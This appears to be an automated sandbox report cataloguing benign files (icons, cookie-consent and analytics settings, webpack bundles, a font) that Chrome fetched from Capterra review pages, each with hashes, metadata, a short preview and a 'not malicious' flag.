                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg width="136px" height="136px" viewBox="0 0 136 136" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">. <title>3</title>. <defs>. <path d="M10.325,0 L107.675,0 C113.37734,0 118,4.62265996 118,10.325 L118,107.675 C118,113.37734 113.37734,118 107.675,118 L10.325,118 C4.62265996,118 0,113.37734 0,107.675 L0,10.325 C0,4.62265996 4.62265996,0 10.325,0 Z" id="path-1"></path>. <filter x="-12.3%" y="-8.9%" width="124.6%" height="124.6%" filterUnits="objectBoundingBox" id="filter-2">. <feMorphology radius="0.5" operator="dilate" in="SourceAlpha" result="shadowSpreadOuter1"></feMorphology>. <feOffset dx="0" dy="4" in="shadowSpreadOuter1" result="shadowOffsetOuter1"></feOffset>. <feGaussianBlur stdDeviation="4" in="shadowOffsetOuter1" result="shadowBlurOuter1"></feGaussianBlur>. <feComposite in="shadowBlurOuter1" in2="SourceAlpha" operator="out" resu
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5341
                                                                                                                                                                                                        Entropy (8bit):4.9548270251118
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:npyIv40wnaWCFpdGHxYa6Ay9uuUOWxGpzjOvjmjJjFZZ2A0F:FqaWCFpk6v9ubhxknOLSJpk
                                                                                                                                                                                                        MD5:EADC6F0564EA47B435CA80E1E30FADF1
                                                                                                                                                                                                        SHA1:BC7DC371A5713C130EF1EE82C7FDD03711DAF433
                                                                                                                                                                                                        SHA-256:15832D7288B38CD446DFC53EB577EF9270324267B842C0F2644F3C3C82F5A18A
                                                                                                                                                                                                        SHA-512:A7267144D8855B43500D33D0A6D93496457C3A38708D9F9D32EDFAC586F5973694E376FA0BF59AB90D0DD2909B664E70A54E213457AF029C5A2E8B730AFE8B02
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://cdn.cookielaw.org/consent/989b7b21-d05b-49b3-9b8a-3dbec459287a/989b7b21-d05b-49b3-9b8a-3dbec459287a.json
                                                                                                                                                                                                        Preview:{"CookieSPAEnabled":false,"CookieSameSiteNoneEnabled":false,"CookieV2CSPEnabled":false,"MultiVariantTestingEnabled":false,"UseV2":true,"MobileSDK":false,"SkipGeolocation":false,"ScriptType":"PRODUCTION","Version":"202403.2.0","OptanonDataJSON":"989b7b21-d05b-49b3-9b8a-3dbec459287a","GeolocationUrl":"https://geolocation.onetrust.com/cookieconsentpub/v1/geo/location","BulkDomainCheckUrl":"https://cookies-data.onetrust.io/bannersdk/v1/domaingroupcheck","RuleSet":[{"Id":"018fce69-2342-72df-91a0-83d13548953b","Name":"Global","Countries":["pr","ps","pw","py","qa","ad","ae","af","ag","ai","al","am","ao","aq","ar","as","au","aw","az","ba","bb","rs","bd","ru","bf","rw","bh","bi","bj","bl","bm","bn","bo","sa","bq","sb","br","sc","sd","bs","bt","bv","sg","sh","bw","sj","by","bz","sl","sn","so","ca","sr","cc","ss","cd","st","cf","sv","cg","ch","sx","sy","ci","sz","ck","cl","cm","cn","co","tc","cr","td","cu","tf","cv","tg","cw","th","cx","tj","tk","tl","tm","tn","to","tr","tt","tv","tw","dj","tz","
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):8028
                                                                                                                                                                                                        Entropy (8bit):7.975943413257389
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:nQVB/tMMVCKM/KBrS186Rmm+0MUxbBh7takdBX3t8vhC10uAS:UFRsB/sHKmWMsFa4BX3t4hCjAS
                                                                                                                                                                                                        MD5:616623443A5C5299FF0DEFAE49527EB7
                                                                                                                                                                                                        SHA1:8CF4ACBECA8FB5A736F352EE2F6472F5AA487A34
                                                                                                                                                                                                        SHA-256:28F034891996679D4A33E89F60A6F1A3A11A106290843FD914CD3DCEB952DDF7
                                                                                                                                                                                                        SHA-512:84CDAB050E685DBE5F1C26DB4E75EC41B334216279208A82964B9950680E670B6EB3B5A5F601BFE81F4A265DC6D0E749662B1B0C4235D664FF344ABBEFB41A5B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.....9d6.....sRGB.........IDATx^..|.U.........B......r..".9DD..u......g.q....2:..x...x...En........$....;...W.h.t']..$.o>MH..W..;.......C......J)!.y<_....vH..B).V..4..Yn8V..c.. ...&+..xD.L.t...{)..U.j../....2..40.X:...S.-.GTC...JrHU..R..:....p...H.B..*FW..e&.Vb...6.z&.....gu.5...!J[...t/..xh.C.j..,..G....:Fx..4...*.(...Q.R.Q@(....G.PA................(....=_......@.a.A. .h.}.$t3H....5.o..=xz.Z.nZ9==.#..).cW.....P.IIM'0.5_.-..!.~....Y......2O.Uf.z ....,p.......K....t.Y....*..)9g9iy.$..Z....L.....W........|t..$...QkR.~k....c......D..G?.w.L,.81....R..2u.UVKU^..;...9.....9k.......;.r....v.....4.?.8.....-UR...#CV.L.....t...f.Wa f.*.....18..._....t.:]t....].-..F*..A....D.@.....qB9......w0....a..f..G'.y16M5..<g..W..Q!...A)...*.e.....S4...v...<.......yw..+...p..9.N6...V*.e...:p..y((.....R..).../Y........P...|..w.+.N=..k.D9{~z.AY..T.HbI.9.Y..|x...D..Iw..&T...V+./S%.7o.i@U...`B....>..G.f..s...E.wz.f........zo. (.%.9.'.a.YU.8Q~I.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JSON data
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8537
                                                                                                                                                                                                        Entropy (8bit):5.171382585673644
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:58/Y7GuL02UXsKgtNlKgtNWFUFft3QaxrDbAJ:L0XsKgxKgZtLxrXO
                                                                                                                                                                                                        MD5:7034E517724161EE46A9F466953DA4EE
                                                                                                                                                                                                        SHA1:54B5F27A082B3B92D0E822ACAA4FDF1711C9CEC7
                                                                                                                                                                                                        SHA-256:9944B3AFDFB67CED97A3DC43678D91B28915A13DC378EAAFF9E87AEBD86053D7
                                                                                                                                                                                                        SHA-512:38638FE25280B009D7BBFD1D0EDC470320735DF2464C9522C5CBBCF6992EC1BA5B53BDEDD9C1322F15CEBF822A3C0DD879A052619A2CFC70004AFF7BA07277E1
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/fsrelay/s/settings/18VAT4/v1/web
                                                                                                                                                                                                        Preview:{"AjaxWatches":[{"URLRegex":"https:\\/\\/reviews.capstage.net\\/\\/?.*","RecordReq":2,"RecordRsp":1,"ReqWhitelist":"globalProductId\nlang\nreviewerEmailAddress","RspWhitelist":"","ReqAllowlist":"globalProductId\nlang\nreviewerEmailAddress","RspAllowlist":"","ReqBody":false,"RspBody":false},{"URLRegex":"https:\\/\\/reviews.capterra.com\\/\\/?.*","RecordReq":2,"RecordRsp":1,"ReqWhitelist":"reviewerEmailAddress\nlang\nglobalProductId","RspWhitelist":"","ReqAllowlist":"reviewerEmailAddress\nlang\nglobalProductId","RspAllowlist":"","ReqBody":false,"RspBody":false}],"BehaviorSignalSettings":{"ElementBlocks":[{"Selector":"#__next\u003ediv\u003ediv.nb-bg-white.nb-px-lg.nb-width-limiter.sm\\:nb-bg-transparent.sm\\:nb-flex.sm\\:nb-flex-col.sm\\:nb-justify-center.sm\\:nb-mb-4xl.sm\\:nb-relative\u003ediv\u003ediv.nb-flex.nb-flex-col.nb-items-center\u003ebutton","Signals":[2,1]}]},"Domains":{"OnlyKnownDomains":false},"ElementBlocks":[{"Selector":"input[type=password]","Consent":false,"Type":1,"Grou
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 120 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):7671
                                                                                                                                                                                                        Entropy (8bit):7.966228288838789
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:o9ZvnGzS6Jgf1CbffvJbYu5ZTV0s9WRMrUL12BQS3osx:o7fGOOg4fvuMV6s9R4Ls33osx
                                                                                                                                                                                                        MD5:F16627360077E5A7AB6A36FDF5C7DBBB
                                                                                                                                                                                                        SHA1:0BF429AAC68AF425A9816C419E5A84F51D5398D2
                                                                                                                                                                                                        SHA-256:307C29CE6EC1F2B91E7402027E036DEDE30AA11CFDC953BDED469A5C14B29F3C
                                                                                                                                                                                                        SHA-512:7E72C38C93D1ACA43C417F2E80456A4AC50619CA9C9C037ADDA8DD3299B6B9AD8BAC74E28B5184A5EBE847E442E1ADA6CCD7CE0FCF47D2A717AFF1545F6D5849
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...x...x.............sRGB.........IDATx^.]Y.\.u...r...(n....... 6.$...y.....<dy..#0....P$[.,9.%J.N.C.........=..uO..:...Z..Q.....0..Y..B!%q....y..bUHY.|.lE.+.F..H.....b.....d.........<.8.'.y.)1z ......EB...%.2.......l....2d.a.I.0.~.9.....N....`..q,.d..fP!Y!.F..dj...*E3.0..2..]n...n`..2.G8..4..-=Dy.AG....1...m....^.4dh..E.2}!..X..$D...xT ....b.h..B..ZA.."........4h......Z.h.V.-K.*%.....wl.Z..f......2.h.9.c..9...`}..=QF...XX.m<IU...r...R....&.p...w...T..ph\..H.X1i..*.`.o.$F8.d.........6+8.*..J.. .A....R.L'.!..0.$......-..FEd..R.0$......O......E:+.....x.C...'..A..#v.@...a.EUP.p...8....Z.....%.{...8.~..4..!...&{..UE.K$..;..#VT^.n..Q.h.1F......L."...gT......$.....h.f..[b4.@..VH..d..sS.8.H.3..A..|.c..,.u..|+....c.\N.e`...d5,.......>F.n.me &.J.D..y.q.R.....6V....4.A.f....^hq.t..a...k6?Y,S.:.^.P.B..E.1:h..Z.^.A.X..p.%..}a..Mb...J..]".......^...pQ$........5.],0..AF...W...H.....`.."..p..b.a\jU..8.k.R.i.8D...y.I.N.k...K.&.Q.+........B..!"
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13031), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13031
                                                                                                                                                                                                        Entropy (8bit):5.351607715367155
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:QtXdCyjj89b5U5/CyAG1msiOE0CpijCp+o9BoV5cYxGMazCyKm9kXQQ3B5Cy5o9U:A29MZXRCaCZ9w5cEGM094QQVo9U
                                                                                                                                                                                                        MD5:B676BBD8A3B5E74078FF7B6B340CDECD
                                                                                                                                                                                                        SHA1:1FD81E87DB9EA81304C4EE41362DD99EFDE90389
                                                                                                                                                                                                        SHA-256:7A9F84BFFCFF2893BD87767A139B4A0E5EF39BD155263EF64E8F74FB0DEFC1F5
                                                                                                                                                                                                        SHA-512:F666CD4D5695351CFED7681E23F340C0FE6C6489FDCE4D9DA56B0A313F1811ECA21547A0D6CA3C339CE0F9CCEE65534AF78CE1275A8E6124A1C51AEFE13E947C
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[7357],{70947:function(e,r,t){"use strict";t.d(r,{Z:function(){return Z}});var n,o=t(2784),i=t(2550),a=t(16734),l=function(){},s=o.createContext({isOpen:!1,isGapless:!1,show:l,hide:l,triggerRef:null,align:"left"}),c=t(90051),d=["children","className","selected","disabled"];function u(){return(u=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var t=arguments[r];for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])}return e}).apply(this,arguments)}var f=o.forwardRef(function(e,r){var t=e.children,n=e.className,l=e.selected,s=e.disabled,c=function(e,r){if(null==e)return{};var t,n,o=function(e,r){if(null==e)return{};var t,n,o={},i=Object.keys(e);for(n=0;n<i.length;n++)t=i[n],r.indexOf(t)>=0||(o[t]=e[t]);return o}(e,r);if(Object.getOwnPropertySymbols){var i=Object.getOwnPropertySymbols(e);for(n=0;n<i.length;n++)t=i[n],!(r.indexOf(t)>=0)&&Object.prototype.propertyIsEnumerable.call(e,t)&
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (16573), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):16573
                                                                                                                                                                                                        Entropy (8bit):5.426372856777445
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:8285PtCyvxq0zgdxM7CyPyq0p0WK/+Cy8q0ibCyD1Jq0MpEwFuCpEPi8nmXavu7w:8BxB8+yBvyXBSzBgEZCeuIpXnivyief
                                                                                                                                                                                                        MD5:4397292C526CD1316C3C2A1E390D6C5F
                                                                                                                                                                                                        SHA1:08C844AAB1173233C3EB271F0614017A4BFF9BFA
                                                                                                                                                                                                        SHA-256:D08C4967134AC87F1D7682864B8B678E38AA4F9D5669A31708892BC1DD046BFC
                                                                                                                                                                                                        SHA-512:5215D7AFF8A8042A65F1429C07A84D13F9FC7FC192B75AEECEE0A9B10396E23840383A0CFF714086353549407191E00578495F0357D18ACDA65E65520BBEC9E8
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/chunks/3445.1bd0170ed561aadb.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3445,8218],{67389:function(e,r,t){"use strict";t.d(r,{Z:function(){return x}});var n=t(2784),l=t(2550),a=t(16734),s=t(94673);function o(e){return(o="function"==typeof Symbol&&"symbol"==typeof Symbol.iterator?function(e){return typeof e}:function(e){return e&&"function"==typeof Symbol&&e.constructor===Symbol&&e!==Symbol.prototype?"symbol":typeof e})(e)}var i=["className","color","isInteractive","padding","children","colorMode"];function c(){return(c=Object.assign?Object.assign.bind():function(e){for(var r=1;r<arguments.length;r++){var t=arguments[r];for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])}return e}).apply(this,arguments)}var d=n.forwardRef(function(e,r){var t,d,x,u=e.className,f=e.color,m=e.isInteractive,h=e.padding,g=e.children,p=e.colorMode,b=function(e,r){if(null==e)return{};var t,n,l=function(e,r){if(null==e)return{};var t,n,l={},a=Object.keys(e);for(n=0;n<a.length;n++)t=a[n],r.indexOf(t)>=0||(l[t
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5530
                                                                                                                                                                                                        Entropy (8bit):4.32585039019299
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:cLDH7lTCDBIyjjw6TQJnE3op4Ani5OZC3dEQy8AE88RJrAta6LkN2DPz9eF+vY0v:UhTC1IyjjwtJnEYVni5l3dEAAE88Qs6P
                                                                                                                                                                                                        MD5:106975D56D45997E9D3BDF754D47E2B6
                                                                                                                                                                                                        SHA1:4F68393DD2B6B847D8A83C0E2A2BBEE4CF35D580
                                                                                                                                                                                                        SHA-256:60A60CFD55864E76A5FEC5C851CA9898363BAC5027E081B9CE6C4A4325FD197A
                                                                                                                                                                                                        SHA-512:03F644DBA0672743876E32F0B8FF3CF55E873CF7621FFEFD8148F0FFD2FA3FACA87DA83587AFAB27C687BFB9AFBEE5377642DA85A4E750FFA0CF900E74BF10D0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://publicate.it/images/amazon.svg
                                                                                                                                                                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="no"?>.<svg. xmlns:svg="http://www.w3.org/2000/svg". xmlns="http://www.w3.org/2000/svg". xmlns:xlink="http://www.w3.org/1999/xlink". version="1.1". width="603". height="182". style="fill:#221f1f". id="svg1936">. <path. d="m 374.00642,142.18404 c -34.99948,25.79739 -85.72909,39.56123 -129.40634,39.56123 -61.24255,0 -116.37656,-22.65135 -158.08757,-60.32496 -3.2771,-2.96252 -0.34083,-6.9999 3.59171,-4.69283 45.01431,26.19064 100.67269,41.94697 158.16623,41.94697 38.774689,0 81.4295,-8.02237 120.6499,-24.67006 5.92501,-2.51683 10.87999,3.88009 5.08607,8.17965". id="path8". style="fill:#ff9900" />. <path. d="m 388.55678,125.53635 c -4.45688,-5.71527 -29.57261,-2.70033 -40.84585,-1.36327 -3.43442,0.41947 -3.95874,-2.56925 -0.86517,-4.71905 20.00346,-14.07844 52.82696,-10.01483 56.65462,-5.2958 3.82764,4.74526 -0.99624,37.64741 -19.79373,53.35128 -2.88385,2.41195 -5.63662,1.12734 -4.35198,-2.07113 4.2209,-10.53
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):9040
                                                                                                                                                                                                        Entropy (8bit):7.6868684888813
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:+7ZoYNMtKwXEJMqIfpoPi0uivBLFerpkIBH7:NYNg7XEJfIfpoPi0fdMrpkIx7
                                                                                                                                                                                                        MD5:51558ECAC5D9ABFC8D7A2680C94C0A1E
                                                                                                                                                                                                        SHA1:8A9BA1FCD218C29532F5AFD65F700883F9578CAF
                                                                                                                                                                                                        SHA-256:78C3F63DA11E4757DEA090422E214D829E77C50043EE4BE47095E320C3133C20
                                                                                                                                                                                                        SHA-512:EB1EAADC4C14779988AEACBEB96077FA6FD54CBAD7C0244AB38B5FF7BA34B467CBF1D5F61D7247DA4891179DDAD0BB59847EAC5C5D779F93729D7E57E907A501
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/67711109-055d-46d1-bf60-43ba35ef896d.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............/...!.............%...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (65200)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):140962
                                                                                                                                                                                                        Entropy (8bit):5.269205002304615
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:MEv1NH6ZMumbFHH4jeUn6SJk1SNoc7I6rRsQo:MEzb5e6Sa1SRBF/o
                                                                                                                                                                                                        MD5:27146517071184FE51BABA67966EBC67
                                                                                                                                                                                                        SHA1:657FF8E9FA872828C1EDE1C4373141C27A7718BF
                                                                                                                                                                                                        SHA-256:BA5F8328A0B6D94815D24E27481690D799E33FB5CF1B0F326FF7BA8A0977EEA6
                                                                                                                                                                                                        SHA-512:985C1E2025221C0808D466D06C684F085C4DCACA028FA6252B8816534D98628534AC5974972C552C52F79447A0EC475560150E07B6509144C7F8EBA49746910E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/chunks/framework-fb999dd119b6be4b.js
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9774],{52967:function(e,n,t){/**. * @license React. * react-dom.production.min.js. *. * Copyright (c) Facebook, Inc. and its affiliates.. *. * This source code is licensed under the MIT license found in the. * LICENSE file in the root directory of this source tree.. */var r,l,a,u,o,i,s=t(2784),c=t(14616);function f(e){for(var n="https://reactjs.org/docs/error-decoder.html?invariant="+e,t=1;t<arguments.length;t++)n+="&args[]="+encodeURIComponent(arguments[t]);return"Minified React error #"+e+"; visit "+n+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}var d=new Set,p={};function m(e,n){h(e,n),h(e+"Capture",n)}function h(e,n){for(p[e]=n,e=0;e<n.length;e++)d.add(n[e])}var g=!("undefined"==typeof window||void 0===window.document||void 0===window.document.createElement),v=Object.prototype.hasOwnProperty,y=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 42500, version 1.0
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):42500
                                                                                                                                                                                                        Entropy (8bit):7.994680899740102
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:768:xmnyrzcxyEZ/Hz5fyLjNBayQ5Z7s/Q658AcFVnxTSo4DVlQ4NAi3nBBy427:xmnyr6yq1fyLj7aN6K5F5xmo4VlQ41xU
                                                                                                                                                                                                        MD5:8C5246074400A5141EA18BF48DFF17EE
                                                                                                                                                                                                        SHA1:B0650D9D042DFDC6E5FBC3B9F79F87822F9EE689
                                                                                                                                                                                                        SHA-256:595C14BD7589B069E4570BA658CFAB8850611639E8A077CA84EF263BFA4671F9
                                                                                                                                                                                                        SHA-512:C2AA785DF137816784B5AB3ABE7DF399E0F31CD46A4A149162345DDC640223FF3998BCD77AA87C017C8F53081D2C7D63C576308DA1174173675A78D194D47FBE
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://fonts.gstatic.com/s/ptsans/v17/jizYRExUiTo99u79D0e0x8mI.woff2
                                                                                                                                                                                                        Preview:wOF2..............m$..............................^..H.`..D.:..............R...H.6.$.. . ..>..|..N[.[qB.6%..m.......5#...Tt.....x....S.K....'..3.X.vLQ......Fa.........1fg.%.h.A.~#.*.p..9.. .U.|"5.j.Y,.0....R@..Y.l;...8.c2..\.)..nf...L.{".#....F..F..Es.......9o...'...ZC..4.w..DR.....4KSY..a.^^.V.*....j.9.[...2J..aI... /._'.........,]..v..T.hnt.kb..|....m.....b.Fn.;.i.A.Q....(.0c...&.F.Q......@rc...,.m.....Q..."Fb.?F.kc~`e.._.r.....g(.P./..*...T.V.r.....?.....GeF.Ih.P.f.f.W..`..H.55w'....-.=.6lAoc@.......=i.cse&..+..+.5.+.nw..k.~..N.....j^.f.o....$3I&/e]....A..+Q..-....>......5P.a03..3n.V.$.z{S.U.=...b;a.Y...O..T....|.3_.G..@...@B...;K...tN0......Aj[[...$.i...G..3W+.S.%.9UY..`....Z.v.(.r...1....!......|eT.Cn.O..,..s%..S..l..C......i.[...Ah9.0.....$..{.+...k.....,.6 .&.R..J..x !..."...+.~.o.jg.J....SK.R.....X.vG.((..7.....2m...L....= ..................h.`....JWE..C..dH...5D.......U.L.E.V.k.'.g.......7Kj0.,...A...SvAx.eZ.......>. )Z.\//..9..EL.)qJ.. ..1+.>_...F
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (13063), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):13063
                                                                                                                                                                                                        Entropy (8bit):5.5914712509986515
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:z1FrNYuBWyiwkaCRykTCfWU94NDjQj8+24i6gHueo1CNCfWd9PYEN4Ywi1wl:z3KyW0CRy3T9gjQjywZCNSWrkYwv
                                                                                                                                                                                                        MD5:455157CB49065FB85FED54901DDAEB0E
                                                                                                                                                                                                        SHA1:248D056B36813AE68A2179DF92860E07CECD7A34
                                                                                                                                                                                                        SHA-256:7641F066C35D0CA15D4897BFE49D640ED4C143FF8F04030C2020CBB2ACFA7B0B
                                                                                                                                                                                                        SHA-512:290DF8FB129D5A33135E6332C0EE89BAD8225CAF1FB13872D06AFB277C867718E7C5F970E10A25D55FB9B6A2BB27AD48267F16C1DD62BBD78590F4E99890ECF3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[29],{"7EA0":function(t,u){t.exports=/[\0-\uD7FF\uE000-\uFFFF]|[\uD800-\uDBFF][\uDC00-\uDFFF]|[\uD800-\uDBFF](?![\uDC00-\uDFFF])|(?:[^\uD800-\uDBFF]|^)[\uDC00-\uDFFF]/},Ckiu:function(t,u){t.exports=/[ \xA0\u1680\u2000-\u200A\u2028\u2029\u202F\u205F\u3000]/},EfWO:function(t,u,e){"use strict";var r=e("q3/s"),s=e("s+nu");function Url(){this.protocol=null,this.slashes=null,this.auth=null,this.host=null,this.port=null,this.hostname=null,this.hash=null,this.search=null,this.query=null,this.pathname=null,this.path=null,this.href=null}u.parse=urlParse,u.resolve=function urlResolve(t,u){return urlParse(t,!1,!0).resolve(u)},u.resolveObject=function urlResolveObject(t,u){return t?urlParse(t,!1,!0).resolveObject(u):u},u.format=function urlFormat(t){s.isString(t)&&(t=urlParse(t));return t instanceof Url?t.format():Url.prototype.format.call(t)},u.Url=Url;var n=/^([a-z0-9.+-]+:)/i,h=/:[0-9]*$/,o=/^(\/\/?(?!\/)[^\?\s]*)(\?[^\s]*)?$/,a=["{","}","|","\
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):219
                                                                                                                                                                                                        Entropy (8bit):5.2418890428897225
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6:XzjbdHhjbzrm6UMPmdXTMXYLqdWzLmr8kdGuLt:fbjmDAmdXTMoLqUnmrnAuLt
                                                                                                                                                                                                        MD5:CD6C396DB0A07FEEC7F35196EC6CE97E
                                                                                                                                                                                                        SHA1:6698D3BD949A5A86DC25755405C7963E30A5528B
                                                                                                                                                                                                        SHA-256:EFCA03EB9332EF82B1A0B2FFB02998DD2ABE2BEF69F4E50BB845683B70470061
                                                                                                                                                                                                        SHA-512:CC1D9030BDCA29563DBBA02B050539B103412A0D108BA55DD31DEF1DED854BB4D766602366DA1C7FC658956B3DD6F31A9104C65FDAE3B0585F5363EB0361E8F2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/static/chunks/app/(spotlight)/p/%5BseoId%5D/%5Bslug%5D/layout-33b8d782933d7a3a.js
                                                                                                                                                                                                        Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5098],{39595:function(n,e,u){Promise.resolve().then(u.t.bind(u,25327,23))}},function(n){n.O(0,[5327,1293,286,1744],function(){return n(n.s=39595)}),_N_E=n.O()}]);
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):4223
                                                                                                                                                                                                        Entropy (8bit):7.149698087011384
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+0jCac5N26MT0D5MdtbZPAVwzVHlwh/6WUUwL7:+0WacoYNMtKw/2iWA
                                                                                                                                                                                                        MD5:2A953772F871B48FBCF464311E85A1EB
                                                                                                                                                                                                        SHA1:8BA9A00F86B452AA4C778FEEFE1159FB5C481E87
                                                                                                                                                                                                        SHA-256:68270FAA6EE7F2DEF7745E9F066ED5C9AA0245A072349B50A7DBC060DFA3C644
                                                                                                                                                                                                        SHA-512:BB785439C4C977DA64C6BAD284D747480D1C2425FC981BB01B693E5A2C5127692A34B63199D0B2B17B53932C3393922E89664090E233BA2B992D5C2E6CFC2EF3
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/464cd3be-e2b8-4f9b-a572-577e31770f58.png?w=60&h=60&dpr=2&auto=format
